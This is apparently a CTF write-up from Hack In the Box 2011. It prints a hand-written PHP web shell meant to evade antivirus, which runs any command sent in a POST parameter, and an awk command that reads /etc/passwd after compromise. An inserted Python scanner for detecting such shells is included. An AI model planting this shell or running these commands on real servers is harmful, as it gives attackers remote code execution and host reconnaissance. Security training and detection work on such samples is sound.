Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion (LFI) vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then only a matter of time before people who found this started uploading web application shells, which would then be included from the application's home page. A simple Google search will give tons of shells that let attackers do a great deal at the mere click of a button. Commands prebuilt into the page allow attackers to search for world-readable files, open reverse connect shells, bind ports to /bin/bash, upload and download files, etc. But most of these shells are detected by antivirus software and flagged as malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here's the code:

simple php shell PoC - karniv0re

System Info

<?php
// Fixed commands only: a quick fingerprint of the host the shell landed on.
echo "/etc/issue:\t".exec("cat /etc/issue")."\n";
echo "uname -a:\t".exec("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec("pwd")."\n";
?>

Command Output

<?php
// Run whatever arrives in the POST parameter "cmd" and stop rendering afterwards.
if (isset($_POST['cmd'])) {
    $cmd = $_POST['cmd'];
    if (strlen($cmd) == 0) {
        $cmd = "true"; // empty input: run a no-op instead of an empty command
    }
    system($cmd);
    die;
}
?>
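The two blocks above differ in exactly the way a defender cares about: the first feeds fixed strings to exec(), the second feeds request data to system(). The following Python scanner is an added example, not part of the original post, that flags that second pattern (a command-execution sink whose argument is a request superglobal, or a variable assigned from one) so a webroot can be swept for shells like this one; the sample PHP snippets are constructed from the code above and the function names are my own.

```python
import re

# Sinks that hand a string to a shell, and the request superglobals that carry attacker input.
SINK_CALL = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
SOURCE_USE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
ASSIGN_FROM_SOURCE = re.compile(r"(\$\w+)\s*=\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")


def find_shell_indicators(php_source: str) -> list[str]:
    """Return one finding per sink call that is fed by request data, either
    directly ($_POST[...] in the argument) or via a variable assigned from a
    request superglobal anywhere earlier in the file (simple file-level taint)."""
    tainted = {m.group(1) for m in ASSIGN_FROM_SOURCE.finditer(php_source)}
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in SINK_CALL.finditer(line):
            arg = line[m.end():]
            tainted_var = any(re.search(re.escape(v) + r"\b", arg) for v in tainted)
            if SOURCE_USE.search(arg) or tainted_var:
                findings.append(f"line {lineno}: {m.group(1).lower()}() fed by request data")
    return findings


# Constructed sample: the "System Info" block, fixed commands only, should not be flagged.
INFO_SAMPLE = r"""<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
?>
"""

# Constructed sample: the "Command Output" block, $cmd is assigned from $_POST then run.
SHELL_SAMPLE = r"""<?php
if(isset($_POST['cmd'])){
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";
}
system($cmd);
die;
}
?>
"""

# Constructed sample: the one-line variant of the same backdoor.
INLINE_SAMPLE = r"""<?php system($_REQUEST['c']); ?>"""

if __name__ == "__main__":
    for name, src in (("info", INFO_SAMPLE), ("shell", SHELL_SAMPLE), ("inline", INLINE_SAMPLE)):
        print(name, find_shell_indicators(src) or "clean")
```

This is a signature for the obvious form only; obfuscated shells (base64 wrappers, eval of concatenated strings) need a different check, so treat a clean result as absence of this pattern, not absence of a shell.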

To get a list of users once you have uploaded and gained access to your shell, you can run:

awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd

Feel free to modify and add features, but remember there are more shells out there that do much more than merely execute a command and display its output.

Happy Hacking!